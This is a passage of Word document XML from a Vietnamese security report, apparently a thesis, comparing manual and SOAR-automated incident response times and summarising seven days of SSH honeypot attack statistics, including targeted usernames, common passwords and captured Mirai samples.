              <w:t xml:space="preserve">Tương quan &amp; Ánh xạ MITRE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tra cứu bảng kỹ thuật thủ công (2 - 3 phút)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Correlation Engine tự động (&lt; 50 ms)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhanh hơn 3.600 lần</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trinh sát ngược (OSINT)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mở trình duyệt gõ AbuseIPDB, Shodan (5 - 8 phút)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse Intel API tự động (1.8 giây)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhanh hơn 200 lần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71">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phân tích Mã độc (VT Scan)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tải file lên web VirusTotal thủ công (4 - 6 phút)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000273">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload Analyzer tự động băm &amp; quét (2.5 giây)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000274">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhanh hơn 120 lần</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000275">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chặn Firewall &amp; Giam Tarpit</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000276">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mở terminal gõ lệnh iptables (2 - 4 phút)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000277">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SOAR Enforcer thực thi tự động (400 ms)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000278">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhanh hơn 450 lần</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79">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tổng thời gian MTTR</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">15 - 26 phút (900 - 1.560 giây)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.8 - 2.5 giây</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027C">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giảm 99.8% độ trễ phản ứng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000027D">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27E">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3048000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586923"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4864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5.2: So sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000280">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5.7 Thống kê và Phân tích Tình báo các Cuộc Tấn công Thực tế từ Internet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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Sau khi triển khai thử nghiệm Honeypot trên một máy chủ đám mây công khai (Public Cloud IP) trong thời gian 7 ngày liên tục, hệ thống đã thu thập được 2.731 sự kiện tấn công thực tế từ khắp nơi trên thế giới:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028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Số lượng địa chỉ IP độc hại duy nhất ghi nhận: 418 địa chỉ IP.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000283">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Số lần tấn công dò quét brute-force: 1.420 đợt (chiếm 52% tổng số sự kiện).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000284">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Tên đăng nhập được nhắm mục tiêu nhiều nhất: 'root' (78%), 'admin' (11%), 'user' (4%), 'ubuntu' (3%), 'test' (2%).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000285">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Mật khẩu phổ biến nhất bị hacker thử nghiệm: '123456', 'password', 'admin', 'root', '12345678', 'qwerty'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000286">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Số lượng mã độc tải lên được bẫy ghi lại: 23 mẫu nhị phân ELF và tập lệnh bash (trong đó 19 mẫu là biến thể của Mirai botnet).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:spacing w:after="80" w:before="160" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2926080"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="170158691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486400"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spacing w:after="160" w:before="40" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình 5.3: Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000289">
      <w:pPr>
        <w:spacing w:after="80" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bảng 5.2: Top các Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table22"/>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1"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
            <w:gridCol w:w="1881"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hạng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Quốc gia Nguồn</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Số Lượng IP Độc Hại</w:t>
            </w:r>
